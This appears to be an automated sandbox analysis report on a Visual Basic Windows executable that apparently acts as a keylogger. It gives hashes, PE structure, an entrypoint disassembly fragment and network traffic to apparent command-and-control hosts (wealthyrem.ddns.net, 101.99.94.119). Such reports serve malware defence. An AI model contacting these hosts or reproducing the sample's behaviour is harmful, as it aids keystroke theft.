                              SHA1:F6A406BB0D842FD7C189DD73A816998E1C98797E
                              SHA-256:C38067D9FFB58F898F2A038AC35C6A05EFCC30E3C3CA670CE037BBA1F9BD0B0C
                              SHA-512:00F4B99F135EFE290A6C4C20EA61B297DAF39A0671D4F7C9C2073688D4C053243930D99F231800043DD84614FB3EDA1AFF6055FE06157FB4008E1B07ADDFA7C9
                              Malicious:false
                              Reputation:low
                              Preview: ....[.2.0.2.1./.0.8./.0.2. .1.5.:.0.2.:.1.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r. .].....

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                              Entropy (8bit):6.65828072595929
                              TrID:
                              • Win32 Executable (generic) a (10002005/4) 99.96%
                              • Generic Win/DOS Executable (2004/3) 0.02%
                              • DOS Executable Generic (2002/1) 0.02%
                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                              File name:loKmeabs9V.exe
                              File size:114688
                              MD5:e0d74762f123eb6603898d1482eb9752
                              SHA1:ee63af5c34a027ba8b8331dd678b15e7a87d26a6
                              SHA256:f06e4c96e86c0f36c82d38de0627c0b81995656c4dcbc136c0fedda868ed8ea0
                              SHA512:0f1daec7056919c4c7662da12f99dc5300243b039ec98f162f1f6eb391dd9905b240abfbc63af3d662c0ba4ae6515fa11a3352b72354ee0c7a1b4147d2c2313a
                              SSDEEP:1536:hSGTBAAP0gRQhGuloEWu6Y9yaipBhHaWQmiPYDqulcgRQhWSGTBAAP:hSGTBxChTlHWu6jbfFtDXlKhWSGTBx
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......J.................@..........D........P....@................

                              File Icon

                              Icon Hash:6a6a2a6a2a2a2a2a

                              Static PE Info

                              General

                              Entrypoint:0x401144
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                              DLL Characteristics:
                              Time Stamp:0x4A04FEB2 [Sat May 9 03:55:30 2009 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:5565993a5a9f2bfb76f28ab304be6bc1

                              Entrypoint Preview

                              Instruction
                              push 00406C04h
                              call 00007F72D4EC7EA5h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              xor byte ptr [eax], al
                              add byte ptr [eax], al
                              inc eax
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax+ebp*2], al
                              cdq
                              shl byte ptr [ebp-4Ah], cl
                              cmp al, 4Eh
                              mov eax, 39F14AE7h
                              xchg eax, ecx
                              jnle 00007F72D4EC7E38h
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add dword ptr [eax], eax
                              add byte ptr [eax], al
                              inc edx
                              add byte ptr [esi], al
                              push eax
                              add dword ptr [ecx], 41h
                              dec esi
                              dec esi
                              dec edi
                              dec esi
                              inc ebx
                              inc ebp
                              push edx
                              dec ecx
                              dec esi
                              inc edi
                              inc ebp
                              dec esi
                              push ebx
                              add byte ptr [ebx], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              dec esp
                              xor dword ptr [eax], eax
                              pop es
                              test al, 83h
                              in eax, dx
                              rol ecx, 21h
                              pushfd
                              inc eax
                              mov edx, CE82C659h
                              inc esp
                              fidivr word ptr [eax+1A7833A9h]
                              xor ecx, edi
                              mov ch, 4Eh
                              cwde
                              adc eax, 5544968Fh
                              adc edi, dword ptr [edx]
                              cmp cl, byte ptr [edi-53h]
                              xor ebx, dword ptr [ecx-48EE309Ah]
                              or al, 00h
                              stosb
                              add byte ptr [eax-2Dh], ah
                              xchg eax, ebx
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              jne 00007F72D4EC7F0Bh
                              add byte ptr [eax], al
                              cmp bl, byte ptr [eax+00h]
                              add byte ptr [eax], al
                              str word ptr [esi+4Fh]
                              dec esi
                              inc esp
                              inc ebp
                              inc esi
                              dec ecx
                              inc ebx
                              dec ecx
                              inc ebp
                              dec esi
                              inc ebx
                              dec ecx
                              inc ebp
                              push ebx
                              add byte ptr [00000E01h], cl

                              Data Directories

                               Name | Virtual Address | Virtual Size | Is in Section
                               IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_IMPORT | 0x14b94 | 0x28 | .text
                               IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x17000 | 0x5baa | .rsrc
                               IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 |
                               IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x7c | .text
                               IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                               IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                              Sections

                               Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                               .text | 0x1000 | 0x13e14 | 0x14000 | False | 0.648217773437 | data | 7.07623900315 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                               .data | 0x15000 | 0x115c | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                               .rsrc | 0x17000 | 0x5baa | 0x6000 | False | 0.545979817708 | data | 6.0375627219 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                              Resources

                               Name | RVA | Size | Type | Language | Country
                               RT_ICON | 0x1bd02 | 0xea8 | data | |
                               RT_ICON | 0x1b45a | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 3507421495, next used block 3509654332 | |
                               RT_ICON | 0x1aef2 | 0x568 | GLS_BINARY_LSB_FIRST | |
                               RT_ICON | 0x1894a | 0x25a8 | data | |
                               RT_ICON | 0x178a2 | 0x10a8 | data | |
                               RT_ICON | 0x1743a | 0x468 | GLS_BINARY_LSB_FIRST | |
                               RT_GROUP_ICON | 0x173e0 | 0x5a | data | |
                               RT_VERSION | 0x171e0 | 0x200 | data | Chinese | Taiwan

                              Imports

                               DLL | Import
                               MSVBVM60.DLL | _CIcos, _adj_fptan, _adj_fdiv_m64, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaErrorOverflow, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp

                              Version Infos

                               Description | Data
                               Translation | 0x0404 0x04b0
                               ProductVersion | 1.00
                               InternalName | TROSSKIFTERNES
                               FileVersion | 1.00
                               OriginalFilename | TROSSKIFTERNES.exe
                               ProductName | COUNTERPART

                              Possible Origin

                               Language of compilation system | Country where language is spoken | Map
                               Chinese | Taiwan |

                              Network Behavior

                              Network Port Distribution

                              TCP Packets

                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                               Aug 2, 2021 15:03:09.932041883 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:09.983387947 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:09.983831882 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.036514997 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.036640882 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.090718031 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.090797901 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.090838909 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.090862036 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.090874910 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.090895891 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.090924978 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.142365932 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.142405033 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.142424107 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.142442942 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.142462015 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.142479897 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.142499924 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.142518997 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.142592907 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.142682076 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.194062948 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.194097996 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.194116116 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.194135904 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.194155931 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.194175005 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.194197893 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.194219112 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.194240093 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.194259882 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.194279909 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.194281101 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.194298983 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.194319010 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.194338083 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.194361925 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.194380045 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.194382906 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.194431067 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.194624901 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.245873928 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.245919943 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.245935917 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.245954990 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.245978117 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246001959 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246037960 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246057987 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246078968 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246098042 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246117115 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246138096 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246160030 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246181011 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246201038 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246220112 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246239901 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246258974 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246279001 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246298075 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246320963 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246345043 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246364117 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246383905 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246402979 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246421099 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246440887 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246438980 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.246459961 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246481895 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.246620893 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.297890902 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.297957897 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.298026085 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.298057079 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.298095942 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.298125029 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.298155069 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.298183918 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.298214912 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.298245907 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.298248053 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.298276901 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.298305988 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.298330069 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.298341990 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.298365116 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.298378944 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.298397064 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.298409939 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.298434019 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.298439980 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.298465014 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.298471928 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.298508883 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.298532009 CEST | 49734 | 80 | 192.168.2.3 | 101.99.94.119
                               Aug 2, 2021 15:03:10.298661947 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3
                               Aug 2, 2021 15:03:10.298697948 CEST | 80 | 49734 | 101.99.94.119 | 192.168.2.3

                              UDP Packets

                               Timestamp | Source Port | Dest Port | Source IP | Dest IP
                               Aug 2, 2021 15:01:02.679708958 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:03.987540007 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:04.015264988 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:05.756846905 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:05.781485081 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:06.778383970 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:06.805119038 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:08.096107006 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:08.136997938 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:10.938198090 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:10.964843035 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:11.947202921 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:11.973643064 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:13.580502987 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:13.605627060 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:14.742151022 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:14.767044067 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:16.048583031 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:16.073540926 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:16.851861954 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:16.879432917 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:17.866914988 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:17.894478083 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:18.987708092 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:19.015850067 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:19.910012007 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:19.939580917 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:20.738210917 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:20.772495031 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:21.799954891 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:21.832734108 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:22.879910946 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:22.915153027 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:35.138012886 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:35.181376934 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:38.873280048 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:38.910888910 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:01:56.939182997 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:01:56.971487045 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:02:07.444068909 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:02:07.484725952 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:02:13.566667080 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:02:13.604362965 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:03:04.942322969 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:03:04.982295036 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:03:10.911448002 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:03:10.946295977 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:03:39.918612003 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:03:39.952965975 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:03:40.385349989 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:03:40.433784962 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:04:00.486310959 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:04:00.524296045 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:04:01.135952950 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:04:01.168286085 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:04:01.870608091 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:04:01.903352976 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:04:02.285778999 CEST | 63619 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:04:02.320975065 CEST | 53 | 63619 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:04:02.875510931 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:04:02.908174992 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:04:03.801573038 CEST | 61946 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:04:03.826596022 CEST | 53 | 61946 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:04:04.335899115 CEST | 64910 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:04:04.414990902 CEST | 53 | 64910 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:04:05.035968065 CEST | 52123 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:04:05.060872078 CEST | 53 | 52123 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:04:05.853852034 CEST | 56130 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:04:05.889024019 CEST | 53 | 56130 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:04:06.251069069 CEST | 56338 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:04:06.283968925 CEST | 53 | 56338 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:05:57.832459927 CEST | 59420 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:05:57.866383076 CEST | 53 | 59420 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:05:58.471285105 CEST | 58784 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:05:58.496082067 CEST | 53 | 58784 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:06:02.476249933 CEST | 63978 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:06:02.524781942 CEST | 53 | 63978 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:06:06.554744959 CEST | 62938 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:06:06.611047983 CEST | 53 | 62938 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:06:06.867002010 CEST | 55708 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:06:06.894660950 CEST | 53 | 55708 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:08:37.862473965 CEST | 56803 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:08:37.909857988 CEST | 53 | 56803 | 8.8.8.8 | 192.168.2.3
                               Aug 2, 2021 15:09:14.032036066 CEST | 57145 | 53 | 192.168.2.3 | 8.8.8.8
                               Aug 2, 2021 15:09:14.071578026 CEST | 53 | 57145 | 8.8.8.8 | 192.168.2.3

                              DNS Queries

                               Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                               Aug 2, 2021 15:03:10.911448002 CEST | 192.168.2.3 | 8.8.8.8 | 0x89af | Standard query (0) | wealthyrem.ddns.net | A (IP address) | IN (0x0001)

                              DNS Answers

                               Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                               Aug 2, 2021 15:03:10.946295977 CEST | 8.8.8.8 | 192.168.2.3 | 0x89af | No error (0) | wealthyrem.ddns.net | | 194.5.97.128 | A (IP address) | IN (0x0001)
                               Aug 2, 2021 15:05:57.866383076 CEST | 8.8.8.8 | 192.168.2.3 | 0x19b6 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net | | CNAME (Canonical name) | IN (0x0001)

